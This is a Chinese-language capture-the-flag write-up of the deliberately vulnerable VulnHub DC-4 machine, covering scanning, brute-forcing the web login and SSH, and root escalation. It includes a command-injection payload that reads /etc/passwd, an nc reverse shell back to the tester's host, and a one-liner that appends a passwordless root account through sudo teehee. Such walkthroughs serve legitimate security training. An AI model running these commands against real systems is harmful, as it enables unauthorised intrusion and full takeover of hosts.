看完这篇 教你玩转渗透测试靶机vulnhub——DC4

简介: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机DC4渗透测试详解

Vulnhub靶机介绍:

Vulnhub靶机下载:

Vulnhub靶机安装:

Vulnhub靶机漏洞详解:

①:信息收集:

②:暴力破解:

③:提权:

Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。


Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-4.zip


Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。




Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机


渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.30


使用命令:nmap -sS -sV -A -n 172.16.5.30



开启了80和22端口,我们直接访问80端口 dirb 扫了一下没啥 可能就是暴力破解!!



②:暴力破解:

使用一个工具burp设置代理 然后抓个包 输入账号admin密码123456 发送到Intruder模块 设置一个字典 然后 线程设置2000 start attack




这里我们知道知道了密码:happy 成功登入!!



这里应该是个命令执行漏洞,pyload:radio=cat+/etc/passwd&submit=Run 查看用户,发现有三个普通用户:charles、jim、sam



nc -e /bin/bash/ 172.16.5.42 4444

1


使用nc -lvp 4444命令进行反弹,反弹成功 设置python交互 python3 -c "import pty;pty.spawn('/bin/bash')"


信息收集一下 uname -a 进入/home/ 进入/jim/cat test.sh


在backups 中发现了old-passwords.bak


把这个old-passwords.bak里面的复制到kali中然后新建一个字典jim.txt 吧


使用命令:hydra -l jim -P /root/桌面/jim.txt ssh://172.16.5.30



获得密码为:jibril04 登入ssh


登入提示:You have mail 让我们看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入



提示我们使用teehee提权:sudo teehee --help



③:提权:

root权限免密码使用teehee ,teehee 是啥???太菜了不会 ,,,,,,学了半天


大概就是当发现有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户


passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]


echo "axb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

1


至此获取到了flag,渗透测试结束。


Vulnhub靶机渗透总结:

这是做的第五个靶场了,学习的知识点和一些细节就是 :

1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。


2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好

3.把这个old-passwords.bak里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)

4.还有个小失误就是 jim里面有个charles用户 我ssh登入的时候 写的是大写的登了半天没进去(气死我了,还是要多细心呀!!)

5.想感慨一下,因为是第一次做 每次都会发现新问题然后去解决 对自己也挺好的 收获也挺多的 多去尝试就好啦!加油!!


新知识点:

①:学习了hydra (九头蛇)工具的使用

②学习了teehee 提权

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!


相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
34 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
41 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
27 2
|
2月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
47 0
|
5月前
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
|
5月前
|
安全
DC/AC电源模块为现代电子设备提供稳定的能源
DC/AC电源模块为现代电子设备提供稳定的能源
 DC/AC电源模块为现代电子设备提供稳定的能源
|
5月前
|
安全
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
|
3月前
|
芯片 网络架构
开关电源DC-DC电源应用
DC-DC指直流转直流电源(Direct Current)。是一种在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。如,通过一个转换器能将一个直流电压(5.0V)转换成其他的直流电压(1.5V或12.0V),我们称这个转换器为DC-DC转换器,或称之为开关电源或开关调整器。 DC-DC转换器一般由控制芯片,电感线圈,二极管,三极管,电容器构成。在讨论DC-DC转换器的性能时,如果单针对控制芯片,是不能判断其优劣的。其外围电路的元器件特性,和基板的布线方式等,能改变电源电路的性能,因此,应进行综合判断。 DC-DC转换器的使用有利于简化电源电路设计,缩短研制周期,实现最佳指标等,被
|
5月前
|
安全
BOSHIDA 使用DC/AC电源模块时需要注意的事项
BOSHIDA 使用DC/AC电源模块时需要注意的事项
BOSHIDA  使用DC/AC电源模块时需要注意的事项
下一篇
DataWorks